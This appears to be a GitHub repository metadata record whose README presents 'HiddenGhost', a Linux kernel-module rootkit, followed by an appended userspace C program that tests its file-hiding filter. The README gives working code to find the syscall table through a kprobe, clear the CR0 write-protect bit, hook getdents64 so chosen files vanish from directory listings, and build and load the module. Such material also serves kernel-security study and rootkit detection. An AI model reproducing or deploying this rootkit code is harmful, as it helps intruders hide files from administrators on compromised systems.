{"id":20456229,"url":"https://github.com/thebigcicca/HiddenGhost","last_synced_at":"2025-05-08T21:31:42.528Z","repository":{"id":242444987,"uuid":"386371920","full_name":"BrunoCiccarino/HiddenGhost","owner":"BrunoCiccarino","description":"HiddenGhost is an new solution for find system call table with support for 5.7x kernels +","archived":false,"fork":false,"pushed_at":"2024-06-25T23:42:28.000Z","size":100,"stargazers_count":4,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-06-26T00:44:02.560Z","etag":null,"topics":["linux-kernel-hacking","linux-kernel-module","linux-rootkit","lkm","lkm-rootkit","rootkit","syscall","syscall-hook","syscalls"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BrunoCiccarino.png","metadata":{"files":{"readme":"README.adoc","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-07-15T17:25:23.000Z","updated_at":"2024-06-25T23:42:31.000Z","dependencies_parsed_at":"2024-06-14T02:04:23.170Z","dependency_job_id":null,"html_url":"https://github.com/BrunoCiccarino/HiddenGhost","commit_stats":null,"previous_names":["ch4r0nn/dantesghost","ch4r0nn/hiddenghost","brunociccarino/hiddenghost"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BrunoCiccarino%2FHiddenGhost","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BrunoCiccarino%2FHiddenGhost/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BrunoCiccarino%2FHiddenGhos
t/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BrunoCiccarino%2FHiddenGhost/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BrunoCiccarino","download_url":"https://codeload.github.com/BrunoCiccarino/HiddenGhost/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":224771848,"owners_count":17367219,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["linux-kernel-hacking","linux-kernel-module","linux-rootkit","lkm","lkm-rootkit","rootkit","syscall","syscall-hook","syscalls"],"created_at":"2024-11-15T11:21:54.441Z","updated_at":"2025-05-08T21:31:37.196Z","avatar_url":"https://github.com/BrunoCiccarino.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"== HiddenGhost\n \nHidden Ghost *is a new approach to finding the system call table, with support for kernels 5.7 and newer*. 
Hidden Ghost finds the syscall table through ```kallsyms_lookup_name```, whose address it recovers with a kprobe from the ```\u003clinux/kprobes.h\u003e``` header. Since kernel 5.7, ```kallsyms_lookup_name``` is no longer exported to modules; this detour is what makes the lookup work on 5.7 and newer.\n\nBefore explaining in depth how the rootkit works, I will go over the basics.\n\n** Tested On:\n\n[✔️] Debian 12 6.7X amd64\n\n** Usage: \n\n```\n1) Install the kernel headers:\n\nsudo apt install linux-headers-$(uname -r)\n\n2) Install the development tools:\n\nsudo apt install build-essential\n\n3) Install the kernel source (optional; the headers from step 1 are all the module build needs):\n\nsudo apt install linux-headers-$(uname -r) linux-source\n\n4) Go to the /src directory:\n\ncd src\n\n5) Compile the module:\n\nmake\n\n6) Load the module:\n\nsudo insmod main.ko\n\n7) Check that the module has been loaded:\n\ndmesg | tail -n 10\n\n```\n\nAfter these steps are completed, you should see this message:\n\nimage::img/HiddenGhost.png[]\n\n** What is Hooking:\n\nHooking is the act of redirecting or modifying a particular code path. The technique can be used for good or for ill; a well-known example is mid-function hooking. This time I saw an example of a mid-function hook on the UnknownCheats forum that placed a ```jmp``` (```0xE9```) at address ```pAddres```. I won't take much of your time explaining how it works, because there are articles about it: I left two at the end of this readme, mine, where I explain LKMs in depth, and the one about mid-function hooks.\n\n** And how does it hook the syscall?\n\n* 1) Find the Syscall Table:\n\n- The ``find_syscall_table`` function registers a kprobe on ``kallsyms_lookup_name``; once registered, the kprobe's ``addr`` field holds that function's address, which is then called to resolve ``sys_call_table``. The kprobe is unregistered straight away, it only serves as an address oracle.\n\n```c\n#include \u003clinux/kprobes.h\u003e\n\nstatic unsigned long *__syscall_table;\n\n/* Probing the symbol makes the kernel resolve its address for us. */\nstatic struct kprobe kp = {\n    .symbol_name = \"kallsyms_lookup_name\"\n};\n\nunsigned long *find_syscall_table(void)\n{\n    typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);\n    kallsyms_lookup_name_t kallsyms_lookup_name;\n\n    if (register_kprobe(\u0026kp) \u003c 0)\n        return NULL;\n    kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;\n    unregister_kprobe(\u0026kp);\n\n    __syscall_table = (unsigned long*)kallsyms_lookup_name(\"sys_call_table\");\n    return __syscall_table;\n}\n```\n\n
* 2) Unprotect Memory\n\n- The ``unprotect_memory`` function clears the WP bit (bit 16) of CR0. With WP clear, supervisor-mode code can write to every read-only page, not just the one holding the syscall table. The kernel's own ``write_cr0()`` has refused to clear WP since 5.3 (CR0 pinning), so the module writes the register itself: ``write_cr0_forced`` is the same one-line inline-assembly ``mov %0, %%cr0`` helper that Diamorphine uses, and ``cr0`` is the value saved by ``read_cr0()`` in ``ghost_init``. One caveat: CR0 is per-CPU, so the code between ``unprotect_memory`` and ``protect_memory`` must run on a single CPU; this module does not disable preemption around it.\n\n```c\nstatic inline void unprotect_memory(void)\n{\n    write_cr0_forced(cr0 \u0026 ~0x00010000);\n}\n```\n\n* 3) Replace the Original Function\n\n- In ``ghost_init`` the address of the original ``getdents64`` handler is saved and the table entry is overwritten with the address of the hook function (``hook_getdents64``). Note that since the BHI mitigations (mainline 6.9 and the stable backports of those patches) the x86 syscall entry path dispatches through a switch statement rather than an indirect call through ``sys_call_table``, so on such kernels overwriting a table entry no longer redirects the call.\n\n```c\n#include \u003clinux/errno.h\u003e\n#include \u003clinux/unistd.h\u003e\n\n/* The module hooks getdents64 only. */\n#define MY_NR_getdents __NR_getdents64\n\nstatic unsigned long cr0;\n\nstatic int __init ghost_init(void)\n{\n    __syscall_table = find_syscall_table();\n    if (!__syscall_table) {\n        printk(KERN_INFO \"Error, syscall_table not found\\n\");\n        return -ENOENT;\n    }\n\n    cr0 = read_cr0();\n    orig_getdents64 = (void *)__syscall_table[MY_NR_getdents];\n    unprotect_memory();\n    __syscall_table[MY_NR_getdents] = (unsigned long)hook_getdents64;\n    protect_memory();\n\n    printk(KERN_INFO \"Rootkit loaded: Syscall hooked\\n\");\n    return 0;\n}\n```\n\n* 4) Protect Memory\n\nAfter the replacement, the saved CR0 value (with WP set) is written back.\n\n```c\nstatic inline void protect_memory(void)\n{\n    write_cr0_forced(cr0);\n}\n```\n\n
* 5) Interception and Manipulation\n\n- The hook ``hook_getdents64`` runs in place of ``getdents64``: it calls the original handler, copies the returned directory records into a kernel buffer, removes every record whose name is ``file_to_hide`` by shifting the records after it down, copies the shortened buffer back and returns the new length. Two details matter on the kernels this targets. Since 4.17, x86_64 syscall handlers receive a single ``const struct pt_regs *`` instead of the user arguments, so the hook has to use that signature and read ``dirp`` from the saved ``rsi``. And a hidden record's ``d_reclen`` must be read before the ``memmove``, because afterwards that memory holds the next record.\n\n```c\n#include \u003clinux/dirent.h\u003e\n#include \u003clinux/ptrace.h\u003e\n#include \u003clinux/slab.h\u003e\n#include \u003clinux/string.h\u003e\n#include \u003clinux/uaccess.h\u003e\n\n/* x86_64 syscall handlers take the saved user registers (since 4.17). */\ntypedef asmlinkage long (*syscall_t)(const struct pt_regs *);\nstatic syscall_t orig_getdents64;\n\nasmlinkage long hook_getdents64(const struct pt_regs *regs)\n{\n    /* getdents64(fd, dirp, count) arrive in rdi, rsi, rdx */\n    struct linux_dirent64 __user *dirp = (struct linux_dirent64 __user *)regs-\u003esi;\n    struct linux_dirent64 *d, *kdirent = NULL;\n    unsigned long offset = 0;\n    unsigned short reclen;\n    long ret = orig_getdents64(regs);\n\n    if (ret \u003c= 0)\n        return ret;\n\n    kdirent = kzalloc(ret, GFP_KERNEL);\n    if (kdirent == NULL)\n        return ret;\n\n    if (copy_from_user(kdirent, dirp, ret)) {\n        kfree(kdirent);\n        return ret;\n    }\n\n    while (offset \u003c ret) {\n        d = (struct linux_dirent64 *)((char *)kdirent + offset);\n        reclen = d-\u003ed_reclen;\n        if (strcmp(d-\u003ed_name, \"file_to_hide\") == 0) {\n            /* Drop this record: pull the rest of the buffer over it. */\n            memmove(d, (char *)d + reclen, ret - offset - reclen);\n            ret -= reclen;\n        } else {\n            offset += reclen;\n        }\n    }\n\n    if (copy_to_user(dirp, kdirent, ret))\n        ret = -EFAULT;\n    kfree(kdirent);\n    return ret;\n}\n```\n\n* 6) Unloading and Restoring\n\n- When the module is unloaded, the original entry is written back. Nothing waits for threads that are still inside ``hook_getdents64`` at that moment, so unloading while directory listings are in flight can return into freed module text.\n\n```c\nstatic void __exit ghost_exit(void)\n{\n    unprotect_memory();\n    __syscall_table[MY_NR_getdents] = (unsigned long)orig_getdents64;\n    protect_memory();\n\n    printk(KERN_INFO \"Rootkit unloaded: Syscall restored\\n\");\n}\n```\n\nLinks to articles: \n\nhttps://github.com/Ch4r0nN/LKM-Exploration[LKM-Exploration Making drivers from basic to advanced]\n\n\nhttps://www.unknowncheats.me/forum/c-and-c-/67884-mid-function-hook-deal.html[Unknown Cheats]\n\nLinks to the repositories this is based on:\n\nhttps://github.com/m0nad/Diamorphine[Diamorphine]\n\nhttps://github.com/xcellerator/linux_kernel_hacking[Linux Kernel Hacking]\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthebigcicca%2FHiddenGhost","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fthebigcicca%2FHiddenGhost","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthebigcicca%2FHiddenGhost/lists"}
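The filtering step of ``hook_getdents64`` in the README above can be exercised outside the kernel, because it only manipulates a ``getdents64`` record buffer. The following is an added userspace example, not code from the HiddenGhost repository: it builds a constructed directory listing in the ``linux_dirent64`` layout, applies the same in-place compaction the hook performs, and covers the cases that trip naive implementations (the hidden name in the middle, at the end, and repeated; a zero or oversized ``d_reclen`` is rejected rather than looped on). The helper names ``add_dirent``, ``hide_entries``, ``count_entries`` and ``build_sample`` and the sample file names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Record layout getdents64 writes to userspace (include/linux/dirent.h). */
struct linux_dirent64 {
    uint64_t d_ino;
    int64_t  d_off;
    uint16_t d_reclen;
    uint8_t  d_type;
    char     d_name[];
};

/* Append one record to buf the way the kernel does (d_reclen padded to 8 bytes).
 * Returns the new buffer length, or 0 if the record does not fit. */
static size_t add_dirent(char *buf, size_t len, size_t cap, uint64_t ino, const char *name)
{
    size_t reclen = (offsetof(struct linux_dirent64, d_name) + strlen(name) + 1 + 7) & ~(size_t)7;
    struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + len);

    if (len + reclen > cap)
        return 0;
    memset(d, 0, reclen);
    d->d_ino = ino;
    d->d_off = (int64_t)(len + reclen);
    d->d_reclen = (uint16_t)reclen;
    d->d_type = 8;                           /* DT_REG */
    memcpy(d->d_name, name, strlen(name) + 1);
    return len + reclen;
}

/* The filtering step of the hook: drop every record named `hidden`, compacting the
 * buffer in place. Returns the new length, or -1 if a record is malformed. */
static long hide_entries(char *buf, long len, const char *hidden)
{
    long offset = 0;

    while (offset < len) {
        struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + offset);
        long reclen = d->d_reclen;           /* taken before memmove overwrites *d */

        if (reclen == 0 || offset + reclen > len)
            return -1;                       /* refuse a buffer that would loop or overrun */
        if (strcmp(d->d_name, hidden) == 0) {
            memmove(d, buf + offset + reclen, (size_t)(len - offset - reclen));
            len -= reclen;                   /* stay at offset: the next record moved here */
        } else {
            offset += reclen;
        }
    }
    return len;
}

/* Count records in the buffer; with a non-NULL name, count only records of that name. */
static int count_entries(const char *buf, long len, const char *name)
{
    int n = 0;
    long off = 0;

    while (off < len) {
        const struct linux_dirent64 *d = (const struct linux_dirent64 *)(buf + off);
        if (d->d_reclen == 0)
            break;
        if (name == NULL || strcmp(d->d_name, name) == 0)
            n++;
        off += d->d_reclen;
    }
    return n;
}

/* Constructed listing standing in for a getdents64 result: the hidden name appears
 * both in the middle and at the end. Returns the buffer length, or -1 on overflow. */
static long build_sample(char *buf, size_t cap)
{
    static const char *names[] = { ".", "..", "file_to_hide", "notes.txt", "file_to_hide" };
    size_t len = 0;
    size_t i;

    for (i = 0; i < sizeof names / sizeof names[0]; i++) {
        len = add_dirent(buf, len, cap, 1000 + i, names[i]);
        if (len == 0)
            return -1;
    }
    return (long)len;
}

int main(void)
{
    uint64_t store[64];                      /* 8-byte aligned backing for the records */
    char *buf = (char *)store;
    long len = build_sample(buf, sizeof store);
    int before = count_entries(buf, len, NULL);

    len = hide_entries(buf, len, "file_to_hide");
    printf("%d records before, %d after; file_to_hide still listed: %d\n",
           before, count_entries(buf, len, NULL), count_entries(buf, len, "file_to_hide"));
    return 0;
}
```

Build with ``cc -Wall -o hide hide.c`` and run. The walk is the same one the kernel-side hook performs on the user buffer; the ``d_reclen`` bounds check is the guard the module omits because it trusts the buffer the real ``getdents64`` just filled.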